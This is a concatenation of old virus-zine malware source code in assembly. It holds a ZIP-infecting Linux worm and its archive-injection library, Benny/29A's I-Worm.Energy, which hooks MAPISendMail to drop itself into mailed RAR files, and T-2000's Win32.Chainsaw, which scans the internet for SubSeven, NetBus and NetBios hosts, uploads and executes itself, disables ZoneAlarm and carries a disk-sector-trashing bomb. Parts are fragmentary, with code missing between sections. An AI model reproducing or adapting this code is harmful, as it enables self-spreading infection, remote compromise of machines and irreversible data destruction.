write_console:
pushad
push byte -1
mov edx, ecx
mov esi, ecx
pop ecx
.count:
inc ecx
lodsb
test al, al
jnz .count
xchg ecx, edx
push byte 4
push byte 1
pop ebx
pop eax
int 80h
popad
ret
%endif
%ifdef DEBUG
;eax=dword
write_dword:
pushad
sub esp, 32
mov edi, esp
push byte 8
pop ecx
.hexchar:
rol eax, 4
push eax
and eax, 01111b
call .table
db "0123456789ABCDEF",0
.table:
pop ebx
xlatb
stosb
pop eax
loop .hexchar
mov eax, 0d0ah
stosd
mov ecx, esp
call write_console
add esp, 32
popad
ret
%endif
%ifdef DEBUG
output_registers:
pushad
mov ecx, deb_msg0
call write_console
call .0001
db "EAX=", 0
.0001:
pop ecx
call write_console
mov eax, eax
call write_dword
call .0002
db "EBX=", 0
.0002:
pop ecx
call write_console
mov eax, ebx
call write_dword
call .0003
db "ECX=", 0
.0003:
pop ecx
call write_console
mov eax, ecx
call write_dword
call .0004
db "EDX=", 0
.0004:
pop ecx
call write_console
mov eax, edx
call write_dword
call .0005
db "ESP=", 0
.0005:
pop ecx
call write_console
mov eax, esp
call write_dword
call .0006
db "EBP=", 0
.0006:
pop ecx
call write_console
mov eax, ebp
call write_dword
call .0007
db "ESI=", 0
.0007:
pop ecx
call write_console
mov eax, esi
call write_dword
call .0008
db "EDI=", 0
.0008:
pop ecx
call write_console
mov eax, edi
call write_dword
mov ecx, deb_msg0
call write_console
popad
ret
%endif
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WORM.S]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WORM.I]ÄÄÄ
param1 equ 4
param2 equ 8
param3 equ 12
param4 equ 16
param5 equ 20
_Push equ 4
BITS 32
%define LINUX 1
%include "izip.i"
%ifdef LINUX
global izip_maxaddsize
global izip_add
global izip_strlen
global izip_crc32
%endif
;push ptr2dropname
;push sizeof_dropper
;call
izip_maxaddsize:
;eax=size that .zip will increase
push dword [esp+param2]
call izip_strlen
lea eax, [eax+eax+(sizeof_zip_central+sizeof_zip_local)]
add eax, [esp+param1]
ret 8
;push sizeof_zip
;push ptr2zip
;push ptr2dropname
;push sizeof_dropper
;push ptr2dropper
;call
izip_add:
;eax=new sizeof_map
pushad
sub esp, _Stack
mov esi, [esp+_Pushad+_Stack+param4]
sub ecx, ecx
.local_hdr:
cmp dword [esi+zip_loc_sign_], zip_local_sign
jne .central_hdr
movzx eax, word [esi+zip_size_fname]
mov edx, dword [esi+zip_ver_ned_to_extr]
mov ebx, dword [esi+zip_file_time]
inc ecx
cmp word [esi+zip_compression_method], 0
jne .seek_next
%ifndef LINUX
mov edi, [esi+zip_local_fname+eax-4]
or edi, 020202000h
sub edi, ".exe"
%else
cmp byte [esi+zip_local_fname+eax-1]
, "!"
%endif
je .error
.seek_next:
movzx edi, word [esi+zip_extra_field_length]
add eax, edi
add eax, dword [esi+zip_compressed_size]
lea esi, [eax+esi+sizeof_zip_local]
jmp .local_hdr
.central_hdr:
jecxz .error
cmp dword [esi+zip_centr_sign_], zip_central_sign
je .insert_local_hdr
.error:
sub ecx, ecx
.exit:
add esp, _Stack
mov [esp+_Pushad_eax], ecx
popad
ret 20
.insert_local_hdr:
mov ecx, [esp+_Pushad+_Stack+param5]
add ecx, [esp+_Pushad+_Stack+param4]
sub ecx, esi
add esi, ecx
push dword [esp+_Pushad+_Stack+param3]
call izip_strlen
lea edi, [esi+eax+sizeof_zip_local]
add edi, [esp+_Pushad+_Stack+param2]
std
rep movsb
mov byte [edi], "P"
cld
xchg edi, esi
xchg ecx, ebx
mov eax, edi
sub eax, [esp+_Pushad+_Stack+param4]
mov dword [esp+rel_str_local_hdr], eax
mov eax, zip_local_sign
stosd
mov eax, edx
stosd ;version/flags
sub eax, eax
stosw ;stored
mov eax, ecx
stosd ;time/date
push dword [esp+_Pushad+_Stack+param2]
push dword [esp+_Pushad+_Stack+param1+_Push]
call izip_crc32
stosd ;crc32
mov eax, [esp+_Pushad+_Stack+param2]
stosd
stosd ;size
mov esi, [esp+_Pushad+_Stack+param3]
push esi
call izip_strlen
sub ecx, ecx
stosw ;name size
xchg eax, ecx
stosw ;extra size
rep movsb ;name
mov ecx, [esp+_Pushad+_Stack+param2]
mov esi, [esp+_Pushad+_Stack+param1]
rep movsb ;copy dropper
mov esi, edi
sub edi, [esp+_Pushad+_Stack+param4]
mov dword [esp+rel_str_central_hdr], edi
.zip_end_hdr:
cmp dword [esi+zip_centr_sign_], zip_central_sign
jne .insert_central_hdr
movzx eax, word [esi+zip_size_fname_]
movzx edx, word [esi+zip_extra_field_length_]
add eax, edx
movzx edx, word [esi+zip_file_comment_length_]
add eax, edx
mov edx, [esi+zip_ver_made_by_]
test byte [esi+zip_extrnl_file_attr_], 10h
jnz .skip_dir
mov ebx, [esi+zip_file_time_]
mov edi, [esi+zip_disk_number_start_]
mov ecx, [esi+zip_flags_]
.skip_dir:
lea esi, [esi+eax+sizeof_zip_central]
jmp .zip_end_hdr
.insert_central_hdr:
cmp dword [esi+zip_end_sign_], zip_end_sign
jne near .error
push dword [esp+_Pushad+_Stack+param3]
call izip_strlen
push eax
pushad
add eax, sizeof_zip_central
lea edi, [esi+eax]
add [esi+size_of_the_central_directory], eax
movzx eax, word [esi+zipfile_comment_length]
lea ecx, [eax+sizeof_zip_end]
add edi, ecx
add esi, ecx
std
rep movsb
mov byte [edi], "P"
cld
popad
xchg edi, esi
mov eax, zip_central_sign
stosd ;sign
mov eax, edx
stosd ;version
mov eax, ecx
stosw ;flag
pop ecx
sub eax, eax
stosw ;method
xchg eax, ebx
stosd ;time/date
push dword [esp+_Pushad+_Stack+param2]
push dword [esp+_Pushad+_Stack+param1+_Push]
call izip_crc32
stosd ;crc32
mov eax, [esp+_Pushad+_Stack+param2]
stosd
stosd ;size
mov eax, ecx
stosw ;name size
xchg eax, ebx
stosd ;extra size
xchg eax, esi
stosd ;disk/attr
%ifndef LINUX
xchg eax, esi ;no file attributes
%else
mov eax, 0816d0000h ;r-xr-xr-x
%endif
stosd ;
mov eax, [esp+rel_str_local_hdr]
stosd
mov esi, [esp+_Pushad+_Stack+param3]
rep movsb
mov esi, edi
.check_end:
cmp dword [esi+zip_end_sign_], zip_end_sign
jne near .error
add dword [esi+ttl_num_of_ent_on_this_disk], 00010001h
mov eax, [esp+rel_str_central_hdr]
mov dword [esi+off_of_strt_of_cent_directory], eax
movzx eax, word [esi+zipfile_comment_length]
lea ecx, [esi+eax+sizeof_zip_end]
sub ecx, [esp+_Pushad+_Stack+param4]
jmp .exit
;push sizeof_data
;push ptr2data
;call
izip_crc32:
;eax=crc32
pushad
mov edx, [esp+_Pushad+param1]
mov ecx, [esp+_Pushad+param2]
push byte -1
pop eax
.bigloop:
xor al, [edx]
inc edx
mov bl, 8
.bitloop:
shr eax, 1
jnc .no_hash
xor eax, 0EDB88320h
.no_hash:
dec bl
jnz .bitloop
loop .bigloop
not eax
mov [esp+_Pushad_eax], eax
popad
ret 8
;push ptr2string
;call
izip_strlen:
;eax=lenght of the string
pushad
mov esi, [esp+_Pushad+param1]
sub ecx, ecx
.count:
lodsb
test al, al
jz .done
inc ecx
jmp .count
.done:
mov [esp+_Pushad_eax], ecx
popad
ret 4
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[IZIP.S]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE]ÄÄÄ
#!/bin/sh
strip zipworm!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE]ÄÄÄ
COMMENT #
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ I-Worm.Energy ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
hey all...
ÄÄÄÄÄÄÄÄÄÄÄ
it was one b0ring sunday, when I decided to code some small and kewl virus...
I was tired from coding large projectz (HIV, XTC)... I wanted to code one
worm with some nice ideaz, like the Win2k.Stream.
and here it is. after some meditationz, full of experiencez from psychedelics
I decided to call this worm "Energy"... it is very small worm, spreading via
RAR filez. it can parse all processes, hook there MAPISendMail API procedure
and infect all attached RAR filez in a message by dropping itself to there.
very similar technique of the process'es address space manipulationz is
described in my article "Multi-process residency" and Win32.HIV virus. surely
it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps)
also on earlier versionz of Windows NT - but I don't know, I haven't tested it.
it can stay resident in memory as a service, by standard API callz, valid only
in NT systemz. while infecting the RAR archivez it addz itself to there under
the "SETUP.EXE" filename, containing also the standard setup icon. I tried to
optimize the source a bit... I know the worm is not super-small, but I it is
resident heavilly armoured very effective tiny mail-spreading worm.
after execution:
- anti-* stuff
- if initialized by SCM, run as a service process
- copy worm to system directory as "ENERGY.EXE"
- register worm as service process and run it everytime the OS will start
- enum processes, find MAPI32.dll there and hook MAPSendMail (using many
trics)
- wait one minute and again
hook_procedure:
- parse embedded filez and search for RAR filez.
- infect them by worm file: SETUP.EXE, mark as read-only (already-infected
mark).
it is possible that worm containz some bugz. yeah, but I don't care... I'm glad
I was able to finish it in 2 dayz and that it was not b0ring. I had a fun.
If you would like to consult anything with me, feel free to contact me...
(c) 14th November 2000 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Czech Republic ³ Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
#
.586p
.model flat ;blablabla
;extrn OpenServiceA:PROC
;extrn DeleteService:PROC ;***debug only!
extrn OpenSCManagerA:PROC
extrn CreateServiceA:PROC
extrn CloseServiceHandle:PROC
extrn StartServiceCtrlDispatcherA:PROC
extrn RegisterServiceCtrlHandlerA:PROC
extrn SetServiceStatus:PROC
.data
db ? ;some data
.code
Start: ;worm code starts here
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
pop edi
push 0
push edi
push esi
call CopyFileA ;copy worm to sys. dir.
push api_num
pop ecx
call @api_table
dd offset GetModuleHandleA ;adressez of APIz
dd offset GetProcAddress
dd offset VirtualProtect
dd offset CreateFileA
dd offset CloseHandle
dd offset WriteFile
dd offset GetFileSize
dd offset ReadFile
dd offset VirtualFree
dd offset VirtualAlloc
dd offset SetFilePointer
dd offset SetFileAttributesA
api_num = 12
@api_table:
pop ebx
get_apiz:
dec ecx ;decrement counter
mov eax,[ebx+ecx*4]
mov eax,[eax+2]
mov eax,[eax]
mov edx,[esi+ecx*4]
mov [edx],eax ;store API address
test ecx,ecx
jne get_apiz
worm_loop:
mov ebx,offset tmp
push ebx
push PROC_COUNT
mov esi,offset proc_dump
push esi
call EnumProcesses ;enum all processez
dec eax
jne end_seh
worm_wait:
push 60000
call Sleep ;wait one minute
jmp worm_loop ;and try again.
;infect processez
proc_infect Proc
pushad
push eax
push 0
push 2 or 8 or 10h or 20h or 400h
call OpenProcess ;get handle to process
xchg eax,ecx
jecxz end_proc_infect
mov ebx,ecx
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virtual_end-Start
push 0
push ebx
call VirtualAllocEx ;allocate there memory
xchg eax,ecx ;for worm
jecxz end_proc_infect2
mov esi,ecx
push 0
push virtual_end-Start
push offset Start
push esi
push ebx
call WriteProcessMemory ;copy there worm body
dec eax
jne end_proc_infect3
push -1
push ecx
call WaitForSingleObject ;wait for its termination
call CloseHandle ;and close its handle
jmp end_proc_infect2 ;and quit
end_proc_infect3:
push MEM_RELEASE
push 0
push esi
push ebx
call VirtualFreeEx ;release memory if failed
end_proc_infect2:
push ebx
call CloseHandle ;close handle to process
end_proc_infect:
popad
ret ;and quit
proc_infect EndP
@pushsz 'MAPI32.dll'
mov eax,12345678h
_gmha = dword ptr $-4
call eax ;get address of MAPI32.dll
xchg eax,ecx
jecxz end_seh ;quit if not loaded
@pushsz 'MAPISendMail'
push ecx
mov eax,12345678h
_gpa = dword ptr $-4
call eax ;get address of
xchg eax,ecx ;MAPISendMail API
jecxz end_seh
mov esi,ecx ;to ESI
pushad
mov edi,[esp.cPushad] ;get ptr to message
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push edi
mov ebx,[esp.cPushad.28]
mov ecx,[ebx+40] ;number of attachmentz
mov ebx,[ebx+44] ;ptr to file fieldz
f_parse:mov esi,[ebx+12]
lea edi,[ebp + arc_buffer - gdelta]
push edi
@copysz
dec edi
cmp byte ptr [edi-1],'\'
je over_slash
mov al,'\'
stosb
over_slash:
mov esi,[ebx+16]
@copysz
or [esi-5],20202020h ;lower case
cmp [esi-5],'rar.'
pop esi ;create path+filename
jne o_r ;quit if not RAR file
call infect_archive ;try to infect this file
o_r: sub ebx,-24
loop f_parse ;try another file in msg
pop edi
call @m_res
old_MAPI_api db 5 dup (90h)
@m_res: pop esi
movsd
movsb ;remove the API hooker
jmp end_seh ;and quit
push 0
push eax
mov eax,12345678h
_gfs = dword ptr $-4
call eax ;get its size
push eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push eax
push 0
mov eax,12345678h
_va = dword ptr $-4
call eax ;allocate enough memory
test eax,eax
pop edx
je end_file
xchg eax,ebx
push edx
push 0
lea eax,[ebp + tmp - gd]
push eax
push edx
push ebx
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_rf = dword ptr $-4 ;and copy there worm
call eax
call close_file ;close handle to file
pop edi
pushad
mov esi,ebx
call CRC32 ;calculate CRC32 of
mov [ebp + RARCRC32 - gd],eax ;the worm file
popad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ or GENERIC_WRITE
push esi
mov eax,12345678h
_cfa = dword ptr $-4
call eax ;open the archive
inc eax
je end_file2
dec eax
mov [ebp + hFile - gd],eax ;save its handle
push 2
push 0
push 0
push eax
mov eax,12345678h
_sfp = dword ptr $-4
call eax ;go to EOF
pushad
lea esi,[ebp + RARHeaderCRC+2 - gd]
push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of
mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header
popad ;and save it
push 0
lea eax,[ebp + tmp - gd]
push eax
push end_RAR-RARHeader
call end_RAR
RARHeader: ;No comment ;)
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SETUP.EXE'
end_RAR:
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_wf = dword ptr $-4
call eax ;write RAR file header
push 0
lea eax,[ebp + tmp - gd]
push eax
push edi
push ebx
push dword ptr [ebp + hFile - gd]
call [ebp + _wf - gd] ;write the worm
end_file2:
push MEM_RELEASE
push 0
push ebx
mov eax,12345678h
_vf = dword ptr $-4
call eax ;release the memory
end_file:
call close_file ;close the archive
push FILE_ATTRIBUTE_READONLY
push esi
mov eax,12345678h
_sfaa = dword ptr $-4
call eax ;set READ-ONLY attribute
jmp end_seh ;and quit
close_file:
push 12345678h ;handle...
hFile = dword ptr $-4
mov eax,12345678h
_ch = dword ptr $-4
call eax ;close file handle
ret
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
SVCHandler:
ret
CRC32 EndP
ThreadEntry EndP
;log on to SCM
SVCRegister Proc
call _dt
dd offset e_name+5
dd offset service_start
dd 0
dd 0
_dt: call StartServiceCtrlDispatcherA ;start service dispatcher
dec eax
jne e_svc ;quit if error (no service
;requestz)
push 0
call ExitThread ;terminate this thread
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and quit
SVCRegister EndP
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push offset sys_dir
push eax
push 2
push 10h
push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
push offset e_name+5
push dword ptr [esp]
push esi
call CreateServiceA ;create service item
test eax,eax ;at SCM
je e_scm1 ;quit if error
push eax
call CloseServiceHandle ;close service handlez
e_scm1: push esi
call CloseServiceHandle ;...
e_scm0: ret ;and quit
SVCCreate EndP
;============================================================================
;
;
; NAME: Win32.Chainsaw v1.01
; TYPE: NetBios/SubSeven/NetBus worm.
; DATE: July - September 2000.
; AUTHOR: T-2000 / Immortal Riot.
; E-MAIL: T2000_@hotmail.com
; PAYLOAD: Sector trashing.
;
; FEATURES:
;
; - Disables ZoneAlarm firewall.
; - Not visible in 9x tasklist.
; - Sends usenet message on installation.
; - DoS'es random hosts on 31st of any month.
; - Anti-debugging code.
;
; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1,
; or NetBios, and then installs itself in the systems it can get access
; to. It's main payload is to IGMP DoS random Internet hosts on every 31st
; of the month, which will BSOD every released version of Windoze 95/98
; that isn't patched or firewalled.
;
;============================================================================
; I've kept the code clear and understandable for everyone, no optimizations
; of any kind, mainly due the file alignment, the filesize will usually just
; stay the same wether your code is optimized or not.
.386
.MODEL FLAT
.DATA
JUMPS
EXTRN WSAGetLastError:PROC
EXTRN ioctlsocket:PROC
EXTRN ExitProcess:PROC
EXTRN WSAStartup:PROC
EXTRN WritePrivateProfileStringA:PROC
EXTRN WSACleanup:PROC
EXTRN socket:PROC
EXTRN closesocket:PROC
EXTRN setsockopt:PROC
EXTRN InternetGetConnectedState:PROC
EXTRN DeleteFileA:PROC
EXTRN connect:PROC
EXTRN setsockopt:PROC
EXTRN PeekMessageA:PROC
EXTRN SetFileAttributesA:PROC
EXTRN GetSystemDirectoryA:PROC
EXTRN CreateFileA:PROC
EXTRN recv:PROC
EXTRN send:PROC
EXTRN sendto:PROC
EXTRN CloseHandle:PROC
EXTRN GetSystemTime:PROC
EXTRN GetModuleHandle
EXTRN RegOpenKeyExA:PROC
EXTRN RegSetValueExA:PROC
EXTRN RegCloseKey:PROC
EXTRN ReadFile:PROC
EXTRN CopyFileA:PROC
EXTRN WNetAddConnection2A:PROC
EXTRN WNetCancelConnection2A:PROC
EXTRN SetErrorMode:PROC
EXTRN GetModuleFileNameA:PROC
EXTRN FindWindowA:PROC
EXTRN PostMessageA:PROC
EXTRN GetTickCount:PROC
EXTRN WriteFile:PROC
EXTRN GetLocalTime:PROC
EXTRN WinExec:PROC
EXTRN select:PROC
EXTRN GetPrivateProfileStringA:PROC
EXTRN GetModuleHandleA:PROC
EXTRN GetProcAddress:PROC
EXTRN WNetAddConnection2A:PROC
EXTRN WNetEnumResourceA:PROC
EXTRN WNetOpenEnumA:PROC
EXTRN WNetCloseEnum:PROC
EXTRN RegQueryValueExA:PROC
EXTRN gethostbyname:PROC
EXTRN inet_ntoa:PROC
S7_Upload_Req DB 'RTFChainsaw.exe'
End_S7_Upload_Req:
S7_Upload_Size DB 'SFT046144'
End_S7_Upload_Size:
S7_Exec_Req DB 'FMXChainsaw.exe'
End_S7_Exec_Req:
Nuke_File DB 'BBQ666.COM', 0
sz_Kernel32 DB 'KERNEL32', 0
sz_RegServProc DB 'RegisterServiceProcess', 0
Win_Ini_Run_Key DB 'run', 0
Windows_Section DB 'windows', 0
Run_Key DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0
ZoneAlarm_Window DB 'ZoneAlarm', 0
Reg_Handle_1 DD 0
Reg_Handle_2 DD 0
sz_Account_Mgr DB 'Software\Microsoft\Internet Account Manager', 0
Account_Key DB 'Software\Microsoft\Internet Account Manager\Accounts\'
Account_Index DB '00000000', 0
sz_Def_News_Acc DB 'Default News Account', 0
sz_NNTP_Server DB 'NNTP Server', 0
Size_Acc_Buffer DD 9
Size_NNTP_Buf DD 128
; Header.
; Body.
DB 'WHO WILL SURVIVE', 0Dh, 0Ah
DB 'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah
; End-of-data command.
MsDos_Sys DB 'T:\MSDOS.SYS', 0
Win_Dir_Key DB 'WinDir', 0
Paths_Section DB 'Paths', 0
Slash_Win_Ini DB '\'
Win_Ini DB 'WIN.INI', 0
Remote_Drive DB 'T:', 0
Cover_Name DB '\WINMINE.EXE', 0
Remote_Trojan DB 'T:'
Root_Dropper DB '\Chainsaw.exe', 0
Run_Key_Name DB 'Mines', 0
Boole_False DD 0
Boole_True DD 1
NetBios_Remote DB '\\666.666.666.666', 0
Time_Out: DD 1 ; - Seconds.
DD 500 ; - Milliseconds.
IO_Time_Out DD 5000
Nuke_Conn: DW AF_INET
DW 0
Nuke_IP DD 0
DB 8 DUP(0)
Sub7_Conn: DW AF_INET
DWBI 27374
Sub7_IP DD 0
DB 8 DUP(0)
NetBus_Conn: DW AF_INET
DWBI 12345
NetBus_IP DD 0
DB 8 DUP(0)
NetBus_Conn_2: DW AF_INET
DWBI (12345+1)
NetBus_IP_2 DD 0
DB 8 DUP(0)
NetBios_Conn: DW AF_INET
DWBI 139
NetBios_IP DD 0
DB 8 DUP(0)
Win_Dir DB 260 DUP(0)
Default_String DB 0
Net_Struc_Count DD 1
Enum_Buf_Size DD 666
Enum_Buffer DB 666 DUP(0)
Net_Resource_Struc:
DD 0
DD 0
DD 0
DD 0
DD 0
DD OFFSET NetBios_Remote
DD 0
DD 0
Net_Resource: DD 0
DD 0
DD 0
Net_Usage DD 0
Net_Local_Name DD 0
Net_Remote_Name DD 0
DD 0
DD 0
Select_Struc:
Sock_Count DD 3
Sub7_Socket DD 0
NetBus_Socket DD 0
NetBios_Socket DD 0
IGMP_Socket DD 0
News_Socket DD 0
NetBus_Socket_2 DD 0
Connect_Select: DD 4 DUP(0)
Temp DD 0
Random_Init DD 0
Enum_Handle DD 0
Size_Cover_Path DD 0
System_Time DW 8 DUP(0)
.CODE
DB '[-T2IR-]', 0
START:
PUSH SEM_NOGPFAULTERRORBOX ; On error just bail out
CALL SetErrorMode ; without displaying shit.
CALL GetTickCount
Exit: PUSH 0
CALL ExitProcess
INC EAX
JZ Exit
OR EAX, EAX
JNZ Do_Random_IP
OR EAX, EAX
JNZ Close_Reg_1
OR EAX, EAX
JNZ Close_Reg_1
OR EAX, EAX
JNZ Close_Reg_2
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
PUSH 16
PUSH OFFSET Usenet_Conn
PUSH News_Socket
CALL connect
INC EAX
JZ Close_Reg_2
INC EAX
JZ Close_News
PUSH 0
PUSH 6
PUSH OFFSET s_POST
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
INC EAX
JZ Close_News
PUSH 0
PUSH (End_News_Message-News_Message)
PUSH OFFSET News_Message
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
INC EAX
JZ Close_News
Send_QUIT: PUSH 0
PUSH 6
PUSH OFFSET s_QUIT
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
SHL EBX, 8
MOV BL, AL
SHL EBX, 8
MOV BL, AL
SHL EBX, 8
MOV BL, AL
INC EAX
JZ Do_Random_IP
JMP Do_Random_IP
Copy_ASCIIZ_IP: LODSB
STOSB
INC EAX
JZ Chk_Inet_State
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
INC EAX
JZ Close_Sub7
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
INC EAX
JZ Close_NetBus
MOVSD
MOVSD
MOVSD
MOVSD
PUSH 0
PUSH (End_S7_Upload_Req-S7_Upload_Req)
PUSH OFFSET S7_Upload_Req
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
PUSH 0 ; Fetch the reply, it should
PUSH 512 ; be 'TID' if all is OK.
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX
JZ Try_NetBus
PUSH 0
PUSH (End_S7_Upload_Size-S7_Upload_Size)
PUSH OFFSET S7_Upload_Size
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
INC EAX
JZ Try_NetBus
INC EAX
JZ Try_NetBus
Check_UL_Reply: PUSH 0
PUSH 512
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX
JZ Try_NetBus
CMP [EDI+5], 'ccus' ; Check for 'success'.
JNE Try_NetBus ; Bail on error.
PUSH 0
PUSH (End_S7_Exec_Req-S7_Exec_Req)
PUSH OFFSET S7_Exec_Req
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
INC EAX
JZ Try_NetBios
PUSH 0
PUSH (End_NB_Password-NB_Password)
PUSH OFFSET NB_Password
PUSH NetBus_Socket
CALL send
INC EAX
JZ Try_NetBios
Upload_Worm: PUSH 0
PUSH (End_NB_Upload_Req-NB_Upload_Req)
PUSH OFFSET NB_Upload_Req
PUSH NetBus_Socket
CALL send
INC EAX
JZ Try_NetBios
INC EAX
JZ Try_NetBios
INC EAX
JZ Try_NetBios
OR EBX, EBX
JNZ Close_NetBus_2
INC EBX
JZ Close_NetBios
PUSH 0
PUSH (End_NB_Exec_File-NB_Exec_File)
PUSH OFFSET NB_Exec_File
PUSH NetBus_Socket
CALL send
MOV ECX, 8
REP MOVSD
JMP Chk_Inet_State
PUSH 4
PUSH OFFSET IO_Time_Out
PUSH SO_SNDTIMEO
PUSH SOL_SOCKET
PUSH EBX
CALL setsockopt
RETN
Random_AL_254:
MOV AL, 254
Random_AL: MOVZX EAX, AL
CALL GetTickCount
RCL EAX, 2
XCHG AL, AH
ADD AL, 66h
PUSH 32
POP ECX
POP ECX
RETN
; And I thought NetBus was a lame buggy piece of shit, nothing beats
; SubSeven, even though it's the one of the most advanched RAT's
; available these days, it is programmed pretty badly, the author
; clearly has no understanding of TCP/IP whatsoever, he doesn't
; even terminate his TCP commands with a terminator for example,
; which will lead to fragmented packets fucking up. Also, when you
; supply wrong commands to the server, it will downright hang itself.
; And as a bonus, SubSeven infected systems become slooow, not sure
; exactly why.. I'd say, leave writing RAT's to people who know
; their stuff, like the authors of Back Orifice 2000.
OR EAX, EAX
JNZ Exit_Loc_Share
OR EAX, EAX
JNZ Close_Enum
CALL Locate_Shares
JMP Enum_Resource
OR EAX, EAX
JNZ Enum_Resource
JMP Enum_Resource
Exit_Loc_Share: POPAD
RETN
PUSH EBX
CALL CloseHandle
; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K.
; Smashes disk structures of 1st 2 fixed disks, should be fast and
; unrecoverable.
; .MODEL TINY
; .CODE
;
; ORG 100h
;START:
; MOV AX, 3513h ; Grab INT 13h's address.
; INT 21h
;
; MOV Int13h, BX ; Store it for later.
; MOV Int13h+2, ES
;
; PUSH CS
; POP ES
;
; XOR SI, SI
;
; MOV BX, OFFSET Trash_Text
; MOV CX, (End_Trash_Text-Trash_Text)
;
; ; Decrypt trash text.
;
;Decrypt_Text: XOR BYTE PTR [BX+SI], 66h
;
; INC SI
;
; LOOP Decrypt_Text
;
; INC CX ; CX = 0001h.
;
; MOV DX, 80h+1 ; Start trashing backwards
; ; from 2nd HDD.
;
;Kill_Head: MOV AX, 0302h ; Smash 2 sectors of track
; PUSHF ; 0 with our text.
; DB 9Ah
;Int13h DW 0, 0
;
; INC DH ; Smashed all heads?
; JNZ Kill_Head
;
; DEC DL ; Smashed all HDD's ?
; JS Kill_Head
;
;Exit: RETN ; Back to Windoze..
;
; DB 'T2' ; To pad this file to 666.
;
; ; XOR 66h encrypted:
;
; ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
; ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
; ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
; ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
; ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
; ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
